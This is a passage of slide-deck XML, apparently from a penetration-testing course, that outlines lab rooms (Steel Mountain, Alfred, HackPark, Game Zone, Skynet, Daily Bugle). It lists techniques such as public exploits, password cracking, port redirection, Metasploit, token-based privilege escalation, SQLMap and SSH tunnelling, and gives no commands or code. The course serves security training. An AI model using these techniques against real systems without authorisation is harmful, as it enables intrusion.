              </a:rPr>
              <a:t>Learning to find and utilize publicly available exploit code.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1083" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 3" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5070376" y="3972818"/>
            <a:ext cx="355997" cy="355997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5070376" y="4471194"/>
            <a:ext cx="1780083" cy="222448"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1750"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1375" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Password Cracking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1375" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5070376" y="4779069"/>
            <a:ext cx="6623248" cy="227807"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1792"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1083" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Techniques for breaking weak passwords and hashes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1083" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Image 4" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5070376" y="5434112"/>
            <a:ext cx="355997" cy="355997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5070376" y="5932488"/>
            <a:ext cx="1780083" cy="222448"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1750"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1375" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Port Redirection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1375" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5070376" y="6240363"/>
            <a:ext cx="6623248" cy="227807"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1792"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1083" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Manipulating network traffic to bypass security controls.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1083"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993"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="644426" y="506314"/>
            <a:ext cx="6331148" cy="1150938"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3583" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Steel Mountain and Alfred Rooms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3583" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 1" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="644426" y="1933377"/>
            <a:ext cx="920651" cy="1473101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1841203" y="2117428"/>
            <a:ext cx="2301776" cy="287734"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2250"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1792" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Initial Access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1792" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1841202" y="2515593"/>
            <a:ext cx="5134372" cy="294581"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2292"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1417" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Using Metasploit to gain a foothold on the target system.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1417" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 2" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="644426" y="3406478"/>
            <a:ext cx="920651" cy="1473101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1841203" y="3590529"/>
            <a:ext cx="2301776" cy="287734"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2250"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1792" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1792" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1841202" y="3988694"/>
            <a:ext cx="5134372" cy="589161"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2292"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1417" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Utilizing PowerShell for Windows privilege escalation enumeration.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1417" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 3" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="644426" y="4879579"/>
            <a:ext cx="920651" cy="1473101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1841203" y="5063630"/>
            <a:ext cx="2301776" cy="287734"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2250"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1792" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Escalation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1792" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1841202" y="5461795"/>
            <a:ext cx="5134372" cy="589161"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2292"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1417" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Exploiting Windows authentication tokens to gain Administrator access.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1417"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92031" y="1406723"/>
            <a:ext cx="6179939" cy="1285875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="5041"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4042" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>HackPark and Game Zone Rooms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4042" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5292031" y="3001169"/>
            <a:ext cx="6179939" cy="2450108"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3527"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15240">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="24000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5304731" y="3013870"/>
            <a:ext cx="6153844" cy="588764"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="4000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5511106" y="3143647"/>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Room</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1583" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7565331" y="3143647"/>
            <a:ext cx="1633339"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Key Techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1583" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9616381" y="3143647"/>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Target</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1583" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5304731" y="3602632"/>
            <a:ext cx="6153844" cy="917972"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000">
              <a:alpha val="4000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5511106" y="3732411"/>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HackPark</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1583" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7565331" y="3732411"/>
            <a:ext cx="1633339"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Hydra, Public Exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1583" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9616381" y="3732411"/>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Windows</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1583" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5304731" y="4520605"/>
            <a:ext cx="6153844" cy="917972"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="4000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5511106" y="4650383"/>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Game Zone</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1583" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7565331" y="4650383"/>
            <a:ext cx="1633339"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SQLMap, SSH Tunneling</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1583" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9616381" y="4650383"/>
            <a:ext cx="1636514" cy="329208"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="non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Linux</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1583"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031" y="2165053"/>
            <a:ext cx="6985694" cy="642938"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="5041"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4042" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Skynet and Daily Bugle Rooms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4042" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720031" y="3322241"/>
            <a:ext cx="2571750" cy="321469"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2500"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Skynet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720031" y="3849390"/>
            <a:ext cx="5125045"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Exploiting a Terminator-themed Linux machine, focusing on enumeration and privilege escalation.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1583" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6353274" y="3322241"/>
            <a:ext cx="2571750" cy="321469"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2500"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Daily Bugle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6353274" y="3849390"/>
            <a:ext cx="5125045" cy="658416"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2583"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1583" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
